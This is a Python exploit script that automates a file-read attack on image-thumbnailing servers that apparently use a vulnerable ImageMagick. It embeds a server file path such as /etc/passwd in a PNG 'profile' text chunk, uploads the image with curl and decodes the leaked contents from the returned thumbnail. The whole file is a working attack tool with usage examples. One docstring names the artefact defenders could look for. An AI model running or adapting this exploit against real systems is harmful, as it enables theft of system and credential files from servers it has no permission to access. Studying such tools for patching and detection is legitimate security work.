exploit.py
#!/usr/bin/env python3
import os
import platform
import shlex
import subprocess
import sys
import time
def build_exploit_image():
    """Build the ``exploit`` Docker image used by the encode and decode steps.

    The image is built from ``Dockerfile.exploit`` with the current working
    directory as build context. The build output is not shown or inspected
    here.
    """
    print("Building exploit image...")
    build_cmd = "docker build -t exploit . -f Dockerfile.exploit"
    execute_command(build_cmd)
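def execute_command(command):
    """Run *command* through the shell and return its standard output as text.

    Args:
        command: A complete shell command line. It is passed to the shell
            unchanged (``shell=True``), so every value interpolated into it
            must already be quoted by the caller (for example with
            ``shlex.quote``); otherwise spaces or shell metacharacters in a
            file name or host change what is executed.

    Returns:
        The command's stdout decoded as UTF-8. Bytes that are not valid UTF-8
        are replaced with U+FFFD instead of raising ``UnicodeDecodeError``.
    """
    # print("Executing: "+command)
    process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    if process.returncode != 0:
        # A failed docker/curl call used to be invisible: stderr was dropped
        # and the exit status never checked, so callers reported misleading
        # results. Report it, but keep returning stdout for compatibility.
        print(
            "Command exited with status " + str(process.returncode) + ": "
            + stderr.decode(errors="replace").strip(),
            file=sys.stderr,
        )
    return stdout.decode(errors="replace")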
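def decode_png(png_file = os.getcwd()+"/result.png"):
    """Return the text stored in the first raw profile of *png_file*.

    The image is inspected with ``identify -verbose`` inside the ``exploit``
    container. In that output a raw profile appears as a
    ``Raw profile type:`` header, two further lines (skipped here), and then
    hex-encoded lines that run up to the next blank line. Those hex lines are
    what this function decodes. The same header in the verbose dump of a
    server-processed image is the artefact a defender would look for.

    Args:
        png_file: Path of the PNG to inspect; relative paths are resolved
            against the current working directory. Defaults to
            ``result.png`` in the directory the script was started from.

    Returns:
        The decoded profile text, or ``""`` when no raw profile is present or
        its payload is not valid hex. Bytes that are not valid UTF-8 are
        replaced rather than raising.
    """
    build_exploit_image()
    # ``docker run -v`` needs an absolute host path for a bind mount.
    png_file = os.path.abspath(png_file)
    print("Decoding content from "+png_file+"...\n")
    # Quote the mount spec: the command goes through a shell, and the path
    # may contain spaces or shell metacharacters.
    mount_spec = shlex.quote(png_file + ":/result.png")
    command = "docker run --rm -it -v " + mount_spec + " exploit identify -verbose /result.png"
    image_data = execute_command(command)

    # The original parser relied on CRLF output (a blank line was "\r");
    # stripping each line makes the parsing work for both LF and CRLF.
    lines = [line.strip() for line in image_data.split("\n")]

    header_index = next(
        (i for i, line in enumerate(lines) if "Raw profile type:" in line),
        None,
    )
    if header_index is None:
        print("Unable to find hacker metadata in the image. Nothing to see here!")
        return ""

    # Skip the header and the two lines after it; hex data starts on the third.
    start_raw_data = header_index + 3
    # The hex block ends at the first blank line, or at the end of the output
    # when there is no blank line (previously an uncaught ValueError).
    end_raw_data = start_raw_data
    while end_raw_data < len(lines) and lines[end_raw_data]:
        end_raw_data += 1

    raw_data_str = "".join(lines[start_raw_data:end_raw_data])
    try:
        payload = bytes.fromhex(raw_data_str)
    except ValueError:
        print("Raw profile payload is not valid hex; cannot decode it.", file=sys.stderr)
        return ""
    return payload.decode("utf-8", errors="replace")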
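# Command-line entry point: dispatch on the sub-command given as the first
# argument. A sub-command that is missing required arguments falls through to
# the usage text instead of failing with an IndexError.
args = sys.argv[1:]
command = args[0] if args else ""

if command == "encode" and len(args) >= 3:
    build_exploit_image()
    image = args[1]
    file2cat = args[2]
    encoded_image = "encoded-" + image
    print("Encoding " + file2cat +" into " + image +" as " + encoded_image + " ...")
    # Every interpolated value is shell-quoted because execute_command() runs
    # the string through a shell.
    docker_command = " ".join([
        "docker run --rm -it -v",
        shlex.quote(os.getcwd() + ":/imagedir"),
        "exploit pngcrush -text a \"profile\"",
        shlex.quote(file2cat),
        shlex.quote("/imagedir/" + image),
        shlex.quote("/imagedir/" + encoded_image),
    ])
    execute_command(docker_command)
    print("File encoded as " + encoded_image)
elif command == "decode" and len(args) >= 2:
    print(decode_png(png_file=args[1]))
elif command == "upload" and len(args) >= 2:
    image = args[1]
    # The host is optional. The previous check (len(sys.argv) > 2) was always
    # true at this point, so the default was unreachable and omitting the
    # host raised IndexError.
    host = args[2] if len(args) > 2 else "localhost:5001"
    print("Sending "+image+" to "+host+"...")
    execute_command(
        "curl " + shlex.quote(host + "/upload")
        + " -F " + shlex.quote("file=@" + image)
        + " --compressed -so result.png"
    )
    # NOTE(review): printed regardless of whether the transfer succeeded.
    print("Thumbnailed image received as result.png")
else:
    print("Usage: python3 exploit.py <encode|decode|upload> <image> <file2cat> <host>")
    print()
    print("Example: python3 exploit.py encode image.png /etc/passwd")
    print("Example: python3 exploit.py decode result.png")
    print("Example: python3 exploit.py upload image.png localhost:5001")
    print()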